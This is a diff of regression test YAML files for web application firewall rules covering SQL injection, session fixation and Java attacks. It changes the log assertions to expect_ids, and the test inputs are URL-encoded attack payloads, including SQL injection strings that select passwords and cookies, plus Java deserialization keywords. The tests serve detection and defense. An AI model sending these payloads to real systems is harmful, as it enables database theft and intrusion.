b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml index 32b9038b5..f6691e602 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml @@ -21,7 +21,8 @@ tests: data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 2 desc: | JSON in SQL (REQUEST_FILENAME) @@ -38,7 +39,8 @@ tests: uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 3 desc: | JSON in SQL (ARGS) @@ -56,7 +58,8 @@ tests: data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 4 desc: | JSON in SQL (REQUEST_FILENAME) @@ -73,7 +76,8 @@ tests: uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 5 desc: | JSON in SQL (ARGS) @@ -91,7 +95,8 @@ tests: data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 6 desc: | JSON in SQL (REQUEST_FILENAME) @@ -108,7 +113,8 @@ tests: uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 7 desc: | JSON in SQL (ARGS) @@ -126,7 +132,8 @@ tests: data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 8 desc: | JSON in SQL (REQUEST_FILENAME) @@ -143,7 +150,8 @@ tests: uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 9 desc: | JSON in SQL (ARGS) @@ -161,7 +169,8 @@ tests: data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 10 desc: | JSON in SQL (REQUEST_FILENAME) @@ -178,7 +187,8 @@ tests: uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 11 desc: | JSON in SQL (ARGS) @@ -196,7 +206,8 @@ tests: data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 12 desc: | JSON in SQL (REQUEST_FILENAME) @@ -213,7 +224,8 @@ tests: uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 13 desc: | JSON in SQL (ARGS) @@ -231,7 +243,8 @@ tests: data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 14 desc: | JSON in SQL (REQUEST_FILENAME) @@ -248,7 +261,8 @@ tests: uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 15 desc: | JSON in SQL (ARGS) @@ -266,7 +280,8 @@ tests: data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 16 desc: | JSON in SQL (REQUEST_FILENAME) @@ -283,7 +298,8 @@ tests: uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 17 desc: | JSON in SQL (ARGS) @@ -301,7 +317,8 @@ tests: data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 18 desc: | JSON in SQL (REQUEST_FILENAME) @@ -318,7 +335,8 @@ tests: uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 19 desc: | JSON in SQL (ARGS) @@ -336,7 +354,8 @@ tests: data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 20 desc: | JSON in SQL (REQUEST_FILENAME) @@ -353,7 +372,8 @@ tests: uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 21 desc: | JSON in SQL (ARGS) @@ -371,7 +391,8 @@ tests: data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 22 desc: | JSON in SQL (REQUEST_FILENAME) @@ -388,7 +409,8 @@ tests: uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 23 desc: | JSON in SQL (ARGS) @@ -406,7 +428,8 @@ tests: data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 24 desc: | JSON in SQL (REQUEST_FILENAME) @@ -423,7 +446,8 @@ tests: uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 25 desc: | JSON in SQL (ARGS) @@ -441,7 +465,8 @@ tests: data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 26 desc: | JSON in SQL (REQUEST_FILENAME) @@ -458,7 +483,8 @@ tests: uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 27 desc: | JSON in SQL (ARGS) @@ -476,7 +502,8 @@ tests: data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 28 desc: | JSON in SQL (REQUEST_FILENAME) @@ -493,7 +520,8 @@ tests: uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 29 desc: | JSON in SQL (ARGS) @@ -511,7 +539,8 @@ tests: data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 30 desc: | JSON in SQL (REQUEST_FILENAME) @@ -528,7 +557,8 @@ tests: uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 31 desc: | JSON in SQL (ARGS) @@ -546,7 +576,8 @@ tests: data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 32 desc: | JSON in SQL (REQUEST_FILENAME) @@ -563,7 +594,8 @@ tests: uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 33 desc: | JSON in SQL (ARGS) @@ -581,7 +613,8 @@ tests: data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 34 desc: | JSON in SQL (REQUEST_FILENAME) @@ -598,7 +631,8 @@ tests: uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 35 desc: | JSON in SQL (ARGS) @@ -616,7 +650,8 @@ tests: data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 36 desc: | JSON in SQL (REQUEST_FILENAME) @@ -633,4 +668,5 @@ tests: uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml index 34ab0f5a7..091b97236 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml @@ -19,7 +19,8 @@ tests: data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" version: HTTP/1.0 output: - log_contains: id "942560" + log: + expect_ids: [942560] - test_id: 2 desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e(" stages: @@ -35,4 +36,5 @@ tests: data: "foo=1.e(ascii)" version: HTTP/1.0 output: - log_contains: id "942560" + log: + expect_ids: [942560] diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml index 184b98ef0..33658babd 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml @@ -22,7 +22,8 @@ tests: uri: '/get/foo.php?bar=blah' version: HTTP/1.1 output: - log_contains: id "943100" + log: + expect_ids: [943100] - test_id: 2 desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG" stages: @@ -42,4 +43,5 @@ tests: uri: "/get/foo.php?test=.cookie;expires=" version: HTTP/1.1 output: - log_contains: id "943100" + log: + expect_ids: [943100] diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml index f0d788032..cbd725d85 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml @@ -23,7 +23,8 @@ tests: uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" version: HTTP/1.1 output: - log_contains: id "943110" + log: + expect_ids: [943110] - test_id: 2 desc: "session fixation attack" stages: @@ -39,7 +40,8 @@ tests: uri: "/get?phpsessid=asdfdasfadsads" version: HTTP/1.0 output: - log_contains: id "943110" + log: + expect_ids: [943110] - test_id: 3 desc: "session fixation attack" stages: @@ -55,7 +57,8 @@ tests: uri: "/get?phpsessid=asdfdasfadsads" version: HTTP/1.0 output: - log_contains: id "943110" + log: + expect_ids: [943110] - test_id: 4 desc: Session Fixation Attack (943110) from old modsec regressions stages: @@ -76,4 +79,5 @@ tests: uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" version: HTTP/1.1 output: - no_log_contains: id "943110" + log: + no_expect_ids: [943110] diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml index ca4b42e14..e845e93de 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -21,4 +21,5 @@ tests: uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" version: HTTP/1.1 output: - log_contains: id "943120" + log: + expect_ids: [943120] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml index 89a8d1154..89a8f7567 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Description" rule_id: 944000 tests: - test_id: 1 @@ -22,4 +21,5 @@ tests: uri: "/post" data: "test=value" output: - no_log_contains: "id \"944000\"" + log: + no_expect_ids: [944000] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml index ef283dc65..c1a60d1d6 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Description" rule_id: 944100 tests: - test_id: 1 @@ -22,7 +21,8 @@ tests: version: HTTP/1.0 data: "test=java.lang.Runtime" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 2 desc: Argument test includes keywords java.lang.ProcessBuilder stages: @@ -41,7 +41,8 @@ tests: version: HTTP/1.0 data: "test=java.lang.ProcessBuilder" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 3 desc: Argument name includes keywords java.lang.Runtime stages: @@ -60,7 +61,8 @@ tests: version: HTTP/1.0 data: "java.lang.Runtime=test" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 4 desc: Argument name includes keywords java.lang.ProcessBuilder stages: @@ -79,7 +81,8 @@ tests: version: HTTP/1.0 data: "java.lang.ProcessBuilder=test" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 5 desc: Cookie test includes keywords java.lang.Runtime stages: @@ -99,7 +102,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 6 desc: Cookie test includes keywords java.lang.ProcessBuilder stages: @@ -119,7 +123,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 7 desc: Cookie name includes keywords java.lang.Runtime stages: @@ -139,7 +144,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 8 desc: Cookie name includes keywords java.lang.ProcessBuilder stages: @@ -159,7 +165,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 9 desc: Request header test includes keywords java.lang.Runtime stages: @@ -179,7 +186,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 10 desc: Request header test includes keywords java.lang.ProcessBuilder stages: @@ -199,7 +207,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 11 desc: XML element includes keywords java.lang.Runtime stages: @@ -218,7 +227,8 @@ tests: version: HTTP/1.0 data: "value" output: - no_log_contains: "id \"944100\"" + log: + no_expect_ids: [944100] - test_id: 12 desc: XML attribute name includes keywords java.lang.Runtime stages: @@ -237,7 +247,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - no_log_contains: "id \"944100\"" + log: + no_expect_ids: [944100] - test_id: 13 desc: XML attribute value includes keywords java.lang.Runtime stages: @@ -256,7 +267,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 14 desc: XML element value includes keywords java.lang.Runtime stages: @@ -275,7 +287,8 @@ tests: version: HTTP/1.0 data: "java.lang.Runtime" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 15 desc: XML element includes keywords java.lang.ProcessBuilder stages: @@ -294,7 +307,8 @@ tests: version: HTTP/1.0 data: "value" output: - no_log_contains: "id \"944100\"" + log: + no_expect_ids: [944100] - test_id: 16 desc: XML attribute name includes keywords java.lang.ProcessBuilder stages: @@ -313,7 +327,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - no_log_contains: "id \"944100\"" + log: + no_expect_ids: [944100] - test_id: 17 desc: XML attribute value includes keywords java.lang.ProcessBuilder stages: @@ -332,7 +347,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 18 desc: XML element value includes keywords java.lang.ProcessBuilder stages: @@ -351,4 +367,5 @@ tests: version: HTTP/1.0 data: "java.lang.ProcessBuilder" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml index 294ee8250..7cf19d15c 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Description" rule_id: 944110 tests: - test_id: 1 @@ -22,7 +21,8 @@ tests: version: HTTP/1.0 data: "test=java.Runtime" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 2 desc: Argument test includes keywords java. and ProcessBuilder stages: @@ -41,7 +41,8 @@ tests: version: HTTP/1.0 data: "test=java.ProcessBuilder" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 3 desc: Argument name includes keywords java. and Runtime stages: @@ -60,7 +61,8 @@ tests: version: HTTP/1.0 data: "java.Runtime=test" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 4 desc: Argument name includes keywords java. and ProcessBuilder stages: @@ -79,7 +81,8 @@ tests: version: HTTP/1.0 data: "java.ProcessBuilder=test" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 5 desc: Cookie test includes keywords java. and Runtime stages: @@ -99,7 +102,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 6 desc: Cookie test includes keywords java. and ProcessBuilder stages: @@ -119,7 +123,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 7 desc: Cookie name includes keywords java. and Runtime stages: @@ -139,7 +144,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 8 desc: Cookie name includes keywords java. and ProcessBuilder stages: @@ -159,7 +165,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 9 desc: Request header test includes keywords java. and Runtime stages: @@ -179,7 +186,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 10 desc: Request header test includes keywords java. and ProcessBuilder stages: @@ -199,7 +207,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 11 desc: XML element includes keywords java. and Runtime stages: @@ -218,7 +227,8 @@ tests: version: HTTP/1.0 data: "value" output: - no_log_contains: "id \"944110\"" + log: + no_expect_ids: [944110] - test_id: 12 desc: XML attribute name includes keywords java. and Runtime stages: @@ -237,7 +247,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - no_log_contains: "id \"944110\"" + log: + no_expect_ids: [944110] - test_id: 13 desc: XML attribute value includes keywords java. and Runtime stages: @@ -256,7 +267,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 14 desc: XML element value includes keywords java. and Runtime stages: @@ -275,7 +287,8 @@ tests: version: HTTP/1.0 data: "java.Runtime" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 15 desc: XML element includes keywords java. and ProcessBuilder stages: @@ -294,7 +307,8 @@ tests: version: HTTP/1.0 data: "value" output: - no_log_contains: "id \"944110\"" + log: + no_expect_ids: [944110] - test_id: 16 desc: XML attribute name includes keyworda java. and ProcessBuilder stages: @@ -313,7 +327,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - no_log_contains: "id \"944110\"" + log: + no_expect_ids: [944110] - test_id: 17 desc: XML attribute value includes keywords java. and ProcessBuilder stages: @@ -332,7 +347,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 18 desc: XML element value includes keywords java. and ProcessBuilder stages: @@ -351,4 +367,5 @@ tests: version: HTTP/1.0 data: "java.ProcessBuilder" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml index 3701d12e9..f4b8e75e1 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml @@ -22,7 +22,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.clonetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 2 desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -41,7 +42,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 3 desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -61,7 +63,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 4 desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -81,7 +84,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 5 desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -101,7 +105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 6 desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -120,7 +125,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 7 desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -139,7 +145,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 8 desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -158,7 +165,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 9 desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -177,7 +185,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 10 desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -196,7 +205,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.clonetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 11 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -215,7 +225,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.clonetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 12 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -234,7 +245,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 13 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -253,7 +265,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -278,7 +291,8 @@ tests: {"ProcessBuilder.evil.clonetransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -303,7 +317,8 @@ tests: {"ProcessBuilder.evil.clonetransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -328,7 +343,8 @@ tests: ProcessBuilder.evil.clonetransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: @@ -353,7 +369,8 @@ tests: ProcessBuilder.evil.clonetransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 18 desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" stages: @@ -372,7 +389,8 @@ 